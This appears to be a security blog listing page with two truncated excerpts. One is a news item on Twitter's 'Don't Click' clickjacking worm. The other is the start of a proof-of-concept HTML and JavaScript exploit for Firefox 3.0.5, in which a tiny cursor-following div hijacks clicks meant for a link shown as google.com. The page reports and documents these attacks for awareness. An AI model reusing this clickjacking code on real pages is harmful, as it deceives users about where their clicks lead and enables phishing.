Twitter hit with ‘Don’t Click’ clickjacking attack

Twitter stopped a clickjacking attack on Thursday that quickly spread because it took advantage of social engineering and peoples’ natural curiosity. Tweets began appearing that said “Don’t Click” followed by a link. Naturally, people clicked. When they did so, a tweet was sent from their account with the same “Don’t Click” message and link. “We […]

Continue Reading

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking =========================================== <html> <body> <div id=”mydiv” onmouseover=”document.location=’http://www.milw0rm.com’;” style=”position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px”></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById(‘mydiv’).style.left=mouseX-1; document.getElementById(‘mydiv’).style.top=mouseY-1; } </script> <center> <br> <font style=”font-family:arial;font-size:32px”>Status Bar Obfuscation / Clickjacking</font><br> <font style=”font-family:arial;font-size:24px”>By MrDoug</font><br> <br> <hr size=”3″ width=”500″ color=”#000000″> <br> <font style=”font-family:arial;font-size:20px”>Click the VALID link to google below to visit milw0rm.com</font><br> <br> <a href=”http://www.google.com” […]

Continue Reading